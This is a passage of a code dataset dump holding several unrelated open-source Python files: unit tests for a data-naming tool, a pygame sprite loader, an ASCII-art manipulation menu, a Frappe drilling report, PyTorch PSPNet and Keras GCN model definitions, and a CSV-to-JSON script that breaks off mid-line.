)\n\n alternate_error = (\n \"Subject and session names must contain alternating dashes\"\n \" and underscores (used for separating key-value pairs).\"\n )\n\n all_names = [\"sub-001-date_101010\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n\n assert str(e.value) == alternate_error\n\n all_names = [\"sub-001_ses-002-suffix\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n assert str(e.value) == alternate_error\n\n all_names = [\"sub-001_ses-002-task-check\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n assert str(e.value) == alternate_error\n\n # check these don't raise\n all_names = [\"ses-001_hello-world_one-hundred\"]\n formatting.check_dashes_and_underscore_alternate_correctly(all_names)\n\n all_names = [\"ses-001_hello-world_suffix\"]\n formatting.check_dashes_and_underscore_alternate_correctly(all_names)\n\n def test_get_value_from_bids_name_regexp(self):\n \"\"\"\n Test the regexp that finds the value from a BIDS-name\n key-value pair.\n \"\"\"\n bids_name = \"sub-0123125_ses-11312_datetime-5345323_id-3asd@523\"\n\n sub = utils.get_value_from_key_regexp(bids_name, \"sub\")[0]\n assert sub == \"0123125\"\n\n ses = utils.get_value_from_key_regexp(bids_name, \"ses\")[0]\n assert ses == \"11312\"\n\n datetime = utils.get_value_from_key_regexp(bids_name, \"datetime\")[0]\n assert datetime == \"5345323\"\n\n id = utils.get_value_from_key_regexp(bids_name, \"id\")[0]\n assert id == \"3asd@523\"\n\n # ----------------------------------------------------------------------\n # Utlis\n # ----------------------------------------------------------------------\n\n def make_name(self, key, underscore_position, start, end):\n \"\"\"\n Make name with / without underscore to test every\n possibility.\n \"\"\"\n if underscore_position == \"left\":\n name = f\"{start}_{key}{end}\"\n\n elif underscore_position == \"right\":\n name = f\"{start}{key}_{end}\"\n\n elif underscore_position == \"both\":\n name = f\"{start}_{key}_{end}\"\n\n elif underscore_position == \"none\":\n name = f\"{start}{key}{end}\"\n\n return name\n","repo_name":"neuroinformatics-unit/datashuttle","sub_path":"tests/tests_unit/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":6936,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"20839850756","text":"from pygame import Surface, error, image, SRCALPHA, RLEACCEL\nfrom os.path import join\nfrom rendering.constants import IMAGE_RESOURCE, TILE_SIZE, ARENA_SURFACE_PADDING\nfrom pygame import transform\nfrom pygame import PixelArray\nfrom rendering.constants import REPLACEMENT_COLOR_LIGHT, REPLACEMENT_COLOR_DARK, COLOR_PLAYERS, COLOR_PLAYERS_DARK\nfrom pygame.gfxdraw import aaellipse, filled_ellipse\n\nRESOURCE_TILE_SIZE = 128\n\n\ndef load(path: str) -> Surface:\n try:\n img = image.load_extended(join('assets/sprites', path + \".png\"))\n except error:\n raise SystemExit(\"Could not load image from {}\".format(path))\n\n return img\n\n\ndef put_values_for_entity(block: dict, name: str, alliance: int):\n resource = load(block[name + \"_generic\"][\"name\"])\n PixelArray(resource).replace(REPLACEMENT_COLOR_LIGHT, COLOR_PLAYERS[alliance], 0)\n PixelArray(resource).replace(REPLACEMENT_COLOR_DARK, COLOR_PLAYERS_DARK[alliance], 0)\n for x in range(4):\n for y in range(4):\n if x == 3 and y == 1:\n state = \"state_stand\"\n elif y == 0:\n state = \"state_walk\"\n elif y == 1:\n state = \"state_attack\"\n elif y == 2:\n state = \"state_growing\"\n elif y == 3:\n state = \"state_die\"\n\n if state == \"state_stand\":\n source_size = (RESOURCE_TILE_SIZE, RESOURCE_TILE_SIZE)\n srf_size = (TILE_SIZE, TILE_SIZE)\n source = Surface(source_size, SRCALPHA)\n srf = Surface(srf_size, SRCALPHA)\n source.blit(resource, (0, 0), ((RESOURCE_TILE_SIZE * x, RESOURCE_TILE_SIZE * y), source_size))\n transform.scale(source, (TILE_SIZE, TILE_SIZE), srf)\n\n block[name + str(alliance)][state][\"left\"][\"frame0\"] = srf\n block[name + str(alliance)][\"state_attack\"][\"left\"][\"frame\" + str(x)] = srf\n\n srf = transform.flip(srf, True, False)\n block[name + str(alliance)][state][\"right\"][\"frame0\"] = srf\n block[name + str(alliance)][\"state_attack\"][\"right\"][\"frame\" + str(x)] = srf\n\n block[name + \"_generic\"][\"offset\"] = (TILE_SIZE / -2, -TILE_SIZE)\n else:\n source_size = (RESOURCE_TILE_SIZE, RESOURCE_TILE_SIZE)\n srf_size = (TILE_SIZE, TILE_SIZE)\n source = Surface(source_size, SRCALPHA)\n srf = Surface(srf_size, SRCALPHA)\n source.blit(resource, (0, 0), ((RESOURCE_TILE_SIZE * x, RESOURCE_TILE_SIZE * y), source_size))\n transform.scale(source, (TILE_SIZE, TILE_SIZE), srf)\n\n block[name + str(alliance)][state][\"left\"][\"frame\" + str(x)] = srf\n\n srf = transform.flip(srf, True, False)\n block[name + str(alliance)][state][\"right\"][\"frame\" + str(x)] = srf\n\n\ndef load_pea(block: dict, alliance: int):\n resource = load(block[\"pea_generic\"][\"name\"])\n srf = Surface((TILE_SIZE / 2, TILE_SIZE / 2), SRCALPHA)\n transform.scale(resource, (TILE_SIZE // 2, TILE_SIZE // 2), srf)\n PixelArray(srf).replace(REPLACEMENT_COLOR_LIGHT, COLOR_PLAYERS[alliance], 0)\n PixelArray(srf).replace(REPLACEMENT_COLOR_DARK, COLOR_PLAYERS_DARK[alliance], 0)\n\n block[\"pea\" + str(alliance)][\"resource\"] = srf\n\n block[\"pea_generic\"][\"offset\"] = (TILE_SIZE / -2 + TILE_SIZE / 4, -TILE_SIZE)\n\n\ndef load_ui(block: dict):\n img = load(\"carrotUI\")\n img = img.convert_alpha(img)\n size = int(ARENA_SURFACE_PADDING[0] / 3), int(ARENA_SURFACE_PADDING[0] / 3)\n srf = Surface(size, SRCALPHA)\n transform.scale(img, size, srf)\n block[\"melee\"][\"resource\"] = srf\n\n img = load(\"peaUI\")\n img = img.convert_alpha(img)\n srf = Surface(size, SRCALPHA)\n transform.scale(img, size, srf)\n block[\"ranged\"][\"resource\"] = srf\n\n\ndef generate_shadows(block: dict):\n block[\"offset\"] = (TILE_SIZE / -2, TILE_SIZE / -4)\n\n x = int(TILE_SIZE / 4)\n y = int(TILE_SIZE / 8)\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[0])\n block[\"0\"] = srf\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[1])\n block[\"1\"] = srf\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[2])\n block[\"2\"] = srf\n\n srf = Surface((TILE_SIZE, int(TILE_SIZE / 2)), SRCALPHA)\n filled_ellipse(srf, x * 2, y * 2, x, y, COLOR_PLAYERS_DARK[3])\n block[\"3\"] = srf\n\n\ndef load_all():\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 0)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 1)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 2)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"player\", 3)\n\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 0)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 1)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 2)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"carrot\", 3)\n\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 0)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 1)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 2)\n put_values_for_entity(IMAGE_RESOURCE[\"entities\"], \"sprout\", 3)\n\n load_pea(IMAGE_RESOURCE[\"entities\"], 0)\n load_pea(IMAGE_RESOURCE[\"entities\"], 1)\n load_pea(IMAGE_RESOURCE[\"entities\"], 2)\n load_pea(IMAGE_RESOURCE[\"entities\"], 3)\n\n load_ui(IMAGE_RESOURCE[\"ui\"])\n\n generate_shadows(IMAGE_RESOURCE[\"juice\"][\"shadow\"])\n","repo_name":"AdronTech/CarrotWarfare","sub_path":"rendering/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37771956414","text":"#\n# \n# \n\nfrom functions.selectASCII import selectASCII\nfrom functions.printASCII import printASCII\nfrom functions.imports.loader import loadText\nfrom os import listdir, system\n\n\"\"\"\nFuncion para cargar a memoria los ASCII's predefinidos y los asigna a la variable\nASCIIdir para su uso y modificacion.\n\"\"\"\ndef loadToMemory():\n return {txt: loadText(\"Assets/\" + txt) for txt in listdir(\"Assets\") if not txt.startswith(\"#\")}\nASCIIdir = loadToMemory()\n\n\"\"\"\nshowASCII llama a la funcion selectASCII, la cual retorna un ASCII Art\nen formato matriz. <-- TODAS LAS FUNCIONES HACEN ESTO\nLuego se llama a la funcion printASCII, la cual imprime el ASCII para\nsu visualizacion.\n\"\"\"\ndef showASCII():\n ascii = selectASCII(ASCIIdir)\n printASCII(ascii)\n\n\n\"\"\"\nRota la matriz 90° horario conteniendo el ASCII Art siguiendo la siguiente logica:\n- Todo elemento del mismo indice de columna (izq. a der.), se convierte\n en fila (descendente).\n\"\"\"\ndef rotate90():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(0, len(ascii[0])-1, 1):\n newRow = []\n for col in range(len(ascii)-1, -1, -1):\n newRow.append(ascii[col][row])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nRota la matriz 90° anti-horario siguiendo la misma logica del horario,\nsolo que se invierten los steps para obtener el resultado anti-horario.\n\"\"\"\ndef rotate90Anti():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(len(ascii[0])-1, -1, -1):\n newRow = []\n for col in range(0, len(ascii)-1, 1):\n newRow.append(ascii[col][row])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nRota la matriz 180° horario conteniendo el ASCII Art siguiendo la siguiente logica:\n- Cada fila (ascendente) se vuelve su orden opuesto (ej: matriz[0] -> matriz[-1]),\n pero sus elementos se invierten de orden.\n\"\"\"\ndef rotate180():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(len(ascii)-1,-1,-1):\n newRow = []\n for col in range(len(ascii[row])-1,-1,-1):\n newRow.append(ascii[row][col])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nRotar 180° de forma horaria o anti-horaria resulta en la misma imagen.\n\"\"\"\ndef rotate180Anti():\n ascii = selectASCII(ASCIIdir)\n new_ascii = list()\n\n for row in range(len(ascii)-1,-1,-1):\n newRow = []\n for col in range(len(ascii[row])-1,-1,-1):\n newRow.append(ascii[row][col])\n new_ascii.append(newRow)\n\n printASCII(new_ascii)\n return new_ascii\n\n\n\"\"\"\nItera sobre los caracteres de la matriz y crea un diccionario para\nllevar la cuenta de cada uno.\n\"\"\"\ndef frecChars():\n ascii = selectASCII(ASCIIdir)\n charsDic = {}\n\n for row in ascii:\n for x in row:\n if x in charsDic:\n charsDic[x] += 1\n else:\n charsDic[x] = 1\n\n print(\"%-10s | %10s\" % (\"Caracter\",\"Frecuencia\"))\n print(\"¯\" * 23)\n \n for key,value in charsDic.items():\n print(\"%-10s : %-s\" % (key,value))\n\n\n\"\"\"\nHace un efecto espejo al ASCII Art siguien la siguiente logica:\n- La matriz es la misma, pero los ordenes/indices de los elementos\n de cada fila se invierten.\n\"\"\"\ndef mirrorASCII():\n art = selectASCII(ASCIIdir)\n result=list()\n for y in range(len(art)):\n linea=list()\n for x in range(len(art[0])-1, -1,-1):\n linea.append(art[y][x])\n result.append(linea)\n \n printASCII(result)\n return result\n\n\"\"\"\nPermite abrir un .txt de la carpeta \"Customs\" y la almacena en\nmemoria para su posterior uso dentro del programa.\n\"\"\"\ndef readTxt():\n while True:\n try:\n name = input(\"Nombre del archivo: \")\n ascii = loadText(\"Customs/\" + name)\n ASCIIdir[name] = ascii\n print()\n printASCII(ascii)\n except IOError:\n print(\"Archivo no encontrado...\")\n continue\n break\n\n\"\"\"\nFuncion que contiene un sub-menu para poder seleccionar un ASCII en memoria, modificarlo\ny guardar la modificacion como un nuevo .txt en ./Customs.\n\"\"\"\ndef saveTxt():\n def clear():\n system(\"cls\")\n\n def saveMenu():\n print(\"=\"*100)\n print(\"[1] Rotar 90 grados en sentido horario\")\n print(\"[2] Rotar 90 grados en sentido anti-horario\")\n print(\"[3] Rotar 180 grados en sentido horario\")\n print(\"[4] Rotar 180 grados en sentido anti-horario\")\n print(\"[5] Efecto espejo\")\n print(\"=\"*100)\n \n def save(m):\n ask = \"\\nIngrese nombre para guardar (.txt): \"\n with open(\"Customs/\" + input(ask), \"w\", encoding=\"utf8\") as f:\n for row in m:\n row = \"\\n\" + \"\".join(row)\n f.write(row)\n\n while True:\n saveMenu()\n try:\n opcion = int(input(\"\\nIngrese su opcion: \"))\n except ValueError:\n clear()\n continue\n if opcion == 1:\n clear()\n ascii = rotate90()\n save(ascii)\n break\n elif opcion == 2:\n clear()\n ascii = rotate90Anti()\n save(ascii)\n break\n elif opcion == 3:\n clear()\n ascii = rotate180()\n save(ascii)\n break\n elif opcion == 4:\n clear()\n ascii = rotate180Anti()\n save(ascii)\n break\n elif opcion == 5:\n clear()\n ascii = mirrorASCII()\n save(ascii)\n break\n else:\n print(\"Escoge una de las opciones...\")\n clear()\n continue\n\ndef titulo():\n f = open(\"Assets/#tittle.txt\", 'r', encoding=\"utf8\")\n print()\n print(''.join([line for line in f]))\n print(\"{:^100s}\".format(\"Grupo 4\"))\n f.close()","repo_name":"Adrian-Cespedes/PROG-4.02---Proyecto-1-G4","sub_path":"src/funcHandler.py","file_name":"funcHandler.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7083392697","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\n\ndef execute(filters=None):\n columns = get_columns(filters)\n data = get_data(filters)\n return columns, data\n\ndef get_columns(filters):\n columns = [\n {\"label\": _(\"Drilling Move Log\"), \"fieldname\": \"log\", \"fieldtype\": \"Link\", \"options\": \"Drilling Move Log\", \"width\": 140},\n {\"label\": _(\"Project\"), \"fieldname\": \"project\", \"fieldtype\": \"Link\", \"options\": \"Project\", \"width\": 100},\n {\"label\": _(\"Subproject\"), \"fieldname\": \"subproject\", \"fieldtype\": \"Link\", \"options\": \"Subcontracting Order\", \"width\": 100},\n {\"label\": _(\"Start Date\"), \"fieldname\": \"start_date\", \"fieldtype\": \"Date\", \"width\": 100},\n {\"label\": _(\"End Date\"), \"fieldname\": \"end_date\", \"fieldtype\": \"Date\", \"width\": 100},\n {\"label\": _(\"Team\"), \"fieldname\": \"drilling_team\", \"fieldtype\": \"Link\", \"options\": \"Drilling Team\", \"width\": 150}\n ]\n return columns\n \ndef get_data(filters):\n project_filter = \"\"\n if filters.project:\n project_filter = \"\"\" AND `dmlp`.`project` = \"{0}\" \"\"\".format(filters.project)\n \n projects = frappe.db.sql(\"\"\"\n SELECT\n `dmlp`.`project` AS `project`,\n `dml`.`name` AS `log`,\n `dml`.`date` AS `date`\n FROM `tabDrilling Move Log Project` AS `dmlp`\n LEFT JOIN `tabDrilling Move Log` AS `dml` ON `dml`.`name` = `dmlp`.`parent`\n WHERE\n `dml`.`date` BETWEEN \"{from_date}\" AND \"{to_date}\"\n {project_filter}\n ORDER BY `dml`.`date` DESC, `dml`.`creation` DESC;\n \"\"\".format(from_date=filters.from_date, to_date=filters.to_date, project_filter=project_filter),\n as_dict=True)\n \n data = []\n last_log = None\n for p in projects:\n # check/add log heading\n if p['log'] != last_log:\n data.append({\n 'log': p['log'],\n 'indent': 0\n })\n last_log = p['log']\n # add project row\n project_doc = frappe.get_doc(\"Project\", p['project'])\n data.append({\n 'log': p['log'],\n 'project': p['project'],\n 'indent': 1,\n 'start_date': project_doc.expected_start_date,\n 'end_date': project_doc.expected_end_date,\n 'drilling_team': project_doc.drilling_team\n })\n \n # add subprojects\n for s in project_doc.subprojects:\n data.append({\n 'log': p['log'],\n 'project': p['project'],\n 'subproject': s.subcontracting_order,\n 'indent': 2,\n 'start_date': s.start,\n 'end_date': s.end,\n 'drilling_team': s.team\n })\n return data\n","repo_name":"libracore/hb","sub_path":"heimbohrtechnik/heim_bohrtechnik/report/impact_analysis/impact_analysis.py","file_name":"impact_analysis.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27640671186","text":"# パッケージのimport\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass PSPNet(nn.Module):\n def __init__(self, n_classes):\n super(PSPNet, self).__init__()\n\n # パラメータ設定\n block_config = [3, 4, 6, 3] # resnet50\n img_size = 475\n img_size_8 = 60 # img_sizeの1/8に\n\n # 4つのモジュールを構成するサブネットワークの用意\n self.feature_conv = FeatureMap_convolution()\n self.feature_res_1 = ResidualBlockPSP(\n n_blocks=block_config[0], in_channels=128, mid_channels=64, out_channels=256, stride=1, dilation=1)\n self.feature_res_2 = ResidualBlockPSP(\n n_blocks=block_config[1], in_channels=256, mid_channels=128, out_channels=512, stride=2, dilation=1)\n self.feature_dilated_res_1 = ResidualBlockPSP(\n n_blocks=block_config[2], in_channels=512, mid_channels=256, out_channels=1024, stride=1, dilation=2)\n self.feature_dilated_res_2 = ResidualBlockPSP(\n n_blocks=block_config[3], in_channels=1024, mid_channels=512, out_channels=2048, stride=1, dilation=4)\n\n self.pyramid_pooling = PyramidPooling(in_channels=2048, pool_sizes=[\n 6, 3, 2, 1], height=img_size_8, width=img_size_8)\n\n self.decode_feature = DecodePSPFeature(\n height=img_size, width=img_size, n_classes=n_classes)\n\n self.aux = AuxiliaryPSPlayers(\n in_channels=1024, height=img_size, width=img_size, n_classes=n_classes)\n\n def forward(self, x):\n x = self.feature_conv(x)\n x = self.feature_res_1(x)\n x = self.feature_res_2(x)\n x = self.feature_dilated_res_1(x)\n\n output_aux = self.aux(x) # Featureモジュールの途中をAuxモジュールへ\n\n x = self.feature_dilated_res_2(x)\n\n x = self.pyramid_pooling(x)\n output = self.decode_feature(x)\n\n return (output, output_aux)\n\n\nclass conv2DBatchNormRelu(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, bias):\n super(conv2DBatchNormRelu, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size, stride, padding, dilation, bias=bias)\n self.batchnorm = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n # inplase設定で入力を保存せずに出力を計算し、メモリ削減する\n\n def forward(self, x):\n x = self.conv(x)\n x = self.batchnorm(x)\n outputs = self.relu(x)\n\n return outputs\n\n\nclass FeatureMap_convolution(nn.Module):\n def __init__(self):\n '''構成するネットワークを用意'''\n super(FeatureMap_convolution, self).__init__()\n\n # 畳み込み層1\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias = 3, 64, 3, 2, 1, 1, False\n self.cbnr_1 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias)\n\n # 畳み込み層2\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias = 64, 64, 3, 1, 1, 1, False\n self.cbnr_2 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias)\n\n # 畳み込み層3\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias = 64, 128, 3, 1, 1, 1, False\n self.cbnr_3 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size, stride, padding, dilation, bias)\n\n # MaxPooling層\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n def forward(self, x):\n x = self.cbnr_1(x)\n x = self.cbnr_2(x)\n x = self.cbnr_3(x)\n outputs = self.maxpool(x)\n return outputs\n\n\nclass ResidualBlockPSP(nn.Sequential):\n def __init__(self, n_blocks, in_channels, mid_channels, out_channels, stride, dilation):\n super(ResidualBlockPSP, self).__init__()\n\n # bottleNeckPSPの用意\n self.add_module(\n \"block1\",\n bottleNeckPSP(in_channels, mid_channels,\n out_channels, stride, dilation)\n )\n\n # bottleNeckIdentifyPSPの繰り返しの用意\n for i in range(n_blocks - 1):\n self.add_module(\n \"block\" + str(i+2),\n bottleNeckIdentifyPSP(\n out_channels, mid_channels, stride, dilation)\n )\n\n\nclass conv2DBatchNorm(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, bias):\n super(conv2DBatchNorm, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels,\n kernel_size, stride, padding, dilation, bias=bias)\n self.batchnorm = nn.BatchNorm2d(out_channels)\n\n def forward(self, x):\n x = self.conv(x)\n outputs = self.batchnorm(x)\n\n return outputs\n\n\nclass bottleNeckPSP(nn.Module):\n def __init__(self, in_channels, mid_channels, out_channels, stride, dilation):\n super(bottleNeckPSP, self).__init__()\n\n self.cbr_1 = conv2DBatchNormRelu(\n in_channels, mid_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n self.cbr_2 = conv2DBatchNormRelu(\n mid_channels, mid_channels, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=False)\n self.cb_3 = conv2DBatchNorm(\n mid_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n # スキップ結合\n self.cb_residual = conv2DBatchNorm(\n in_channels, out_channels, kernel_size=1, stride=stride, padding=0, dilation=1, bias=False)\n\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv = self.cb_3(self.cbr_2(self.cbr_1(x)))\n residual = self.cb_residual(x)\n return self.relu(conv + residual)\n\n\nclass bottleNeckIdentifyPSP(nn.Module):\n def __init__(self, in_channels, mid_channels, stride, dilation):\n super(bottleNeckIdentifyPSP, self).__init__()\n\n self.cbr_1 = conv2DBatchNormRelu(\n in_channels, mid_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n self.cbr_2 = conv2DBatchNormRelu(\n mid_channels, mid_channels, kernel_size=3, stride=1, padding=dilation, dilation=dilation, bias=False)\n self.cb_3 = conv2DBatchNorm(\n mid_channels, in_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv = self.cb_3(self.cbr_2(self.cbr_1(x)))\n residual = x\n return self.relu(conv + residual)\n\n\nclass PyramidPooling(nn.Module):\n def __init__(self, in_channels, pool_sizes, height, width):\n super(PyramidPooling, self).__init__()\n\n # forwardで使用する画像サイズ\n self.height = height\n self.width = width\n\n # 各畳み込み層の出力チャネル数\n out_channels = int(in_channels / len(pool_sizes))\n\n # 各畳み込み層を作成\n # この実装方法は愚直すぎてfor文で書きたいところですが、分かりやすさを優先しています\n # pool_sizes: [6, 3, 2, 1]\n self.avpool_1 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[0])\n self.cbr_1 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n self.avpool_2 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[1])\n self.cbr_2 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n self.avpool_3 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[2])\n self.cbr_3 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n self.avpool_4 = nn.AdaptiveAvgPool2d(output_size=pool_sizes[3])\n self.cbr_4 = conv2DBatchNormRelu(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, bias=False)\n\n def forward(self, x):\n\n out1 = self.cbr_1(self.avpool_1(x))\n out1 = F.interpolate(out1, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n out2 = self.cbr_2(self.avpool_2(x))\n out2 = F.interpolate(out2, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n out3 = self.cbr_3(self.avpool_3(x))\n out3 = F.interpolate(out3, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n out4 = self.cbr_4(self.avpool_4(x))\n out4 = F.interpolate(out4, size=(\n self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n # 最終的に結合させる、dim=1でチャネル数の次元で結合\n output = torch.cat([x, out1, out2, out3, out4], dim=1)\n\n return output\n\n\nclass DecodePSPFeature(nn.Module):\n def __init__(self, height, width, n_classes):\n super(DecodePSPFeature, self).__init__()\n\n # forwardで使用する画像サイズ\n self.height = height\n self.width = width\n\n self.cbr = conv2DBatchNormRelu(\n in_channels=4096, out_channels=512, kernel_size=3, stride=1, padding=1, dilation=1, bias=False)\n self.dropout = nn.Dropout2d(p=0.1)\n self.classification = nn.Conv2d(\n in_channels=512, out_channels=n_classes, kernel_size=1, stride=1, padding=0)\n\n def forward(self, x):\n x = self.cbr(x)\n x = self.dropout(x)\n x = self.classification(x)\n output = F.interpolate(\n x, size=(self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n return output\n\n\nclass AuxiliaryPSPlayers(nn.Module):\n def __init__(self, in_channels, height, width, n_classes):\n super(AuxiliaryPSPlayers, self).__init__()\n\n # forwardで使用する画像サイズ\n self.height = height\n self.width = width\n\n self.cbr = conv2DBatchNormRelu(\n in_channels=in_channels, out_channels=256, kernel_size=3, stride=1, padding=1, dilation=1, bias=False)\n self.dropout = nn.Dropout2d(p=0.1)\n self.classification = nn.Conv2d(\n in_channels=256, out_channels=n_classes, kernel_size=1, stride=1, padding=0)\n\n def forward(self, x):\n x = self.cbr(x)\n x = self.dropout(x)\n x = self.classification(x)\n output = F.interpolate(\n x, size=(self.height, self.width), mode=\"bilinear\", align_corners=True)\n\n return output\n","repo_name":"YutaroOgawa/pytorch_advanced","sub_path":"3_semantic_segmentation/utils/pspnet.py","file_name":"pspnet.py","file_ext":"py","file_size_in_byte":10658,"program_lang":"python","lang":"en","doc_type":"code","stars":784,"dataset":"github-code","pt":"5"} +{"seq_id":"31137490961","text":"from keras.models import Model\nfrom keras.layers import Input, Dense\nfrom keras.optimizers import Adam\nfrom keras.regularizers import l2\nfrom GCN.layer import *\nfrom GCN.loss import *\n\n\ndef GCN(hyper):\n num_atoms = hyper[\"num_atoms\"]\n num_features = hyper[\"num_features\"]\n units_conv = hyper[\"units_conv\"]\n units_dense = hyper[\"units_dense\"]\n num_layers = hyper[\"num_layers\"]\n std = hyper[\"data_std\"]\n loss = hyper[\"loss\"]\n task = hyper[\"task\"]\n\n atoms = Input(name='atom_inputs', shape=(num_atoms, num_features))\n adjms = Input(name='adjm_inputs', shape=(num_atoms, num_atoms))\n\n out = atoms\n for _ in range(num_layers):\n out = GCNGraphConv(units_conv, activation='relu')([out, adjms])\n\n out = GCNGraphGather(pooling='sum')(out)\n out = Dense(units_dense, activation='relu')(out)\n out = Dense(units_dense, activation='relu')(out)\n\n if task == \"regression\":\n out = Dense(1, activation='linear', name='output')(out)\n model = Model(inputs=[atoms, adjms], outputs=out)\n model.compile(optimizer=Adam(lr=0.001), loss=loss, metrics=[std_mae(std=std), std_rmse(std=std)])\n elif task == \"binary\":\n out = Dense(1, activation='sigmoid', name='output')(out)\n model = Model(inputs=[atoms, adjms], outputs=out)\n model.compile(optimizer=Adam(lr=0.001), loss=loss)\n elif task == \"classification\":\n out = Dense(1, activation='softmax', name='output')(out)\n model = Model(inputs=[atoms, adjms], outputs=out)\n model.compile(optimizer=Adam(lr=0.001), loss=loss)\n else:\n raise ValueError(\"Unsupported task on model generation.\")\n\n return model\n","repo_name":"blackmints/molecular-parameters","sub_path":"GCN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"8865062900","text":"#!/usr/bin/env python\n# Name: Mark van Malestein\n# Student number: 10807640\n\nimport csv\nimport pandas as pd\nimport json\nimport pycountry\n\ndef parse_data():\n # Doing a bit of preprocessing otherwise i can't make a valid JSON\n with open(\"dataset.csv\", \"r\", newline = \"\") as csvfile:\n data = []\n for row in csv.reader(csvfile, delimiter=\",\"):\n if row:\n row[0], row[3] = row[0], row[3]\n data.append(row)\n headers = data.pop(0)\n\n df = pd.DataFrame.from_records(data, columns = headers)\n\n return df\n\ndef add_codes(df):\n \"\"\"\n adds country codes to JSON\n \"\"\"\n for i in list(pycountry.countries):\n print(i)\n # print(list(pycountry.countries)[0])\n countries = df[\"Country\"]\n abb_list = []\n for country in countries:\n country_name = pycountry.countries.get(name=country)\n off_country_name = pycountry.countries.get(official_name=country)\n if country_name:\n abb_list.append(country_name.alpha_3)\n elif off_country_name:\n abb_list.append(off_country_name.alpha_3)\n else:\n abb_list.append(\"NaN\")\n\n df = df.assign(Code=abb_list)\n return df\n\n\ndef converting(df):\n \"\"\"\n Converts dataframe to json format and writes this in a file\n \"\"\"\n\n # Write in file and let user know the name of the file\n json = df.to_json(orient = \"records\")\n with open(\"json.js\", \"w\") as file:\n file.write(json)\n\n\nif __name__ == 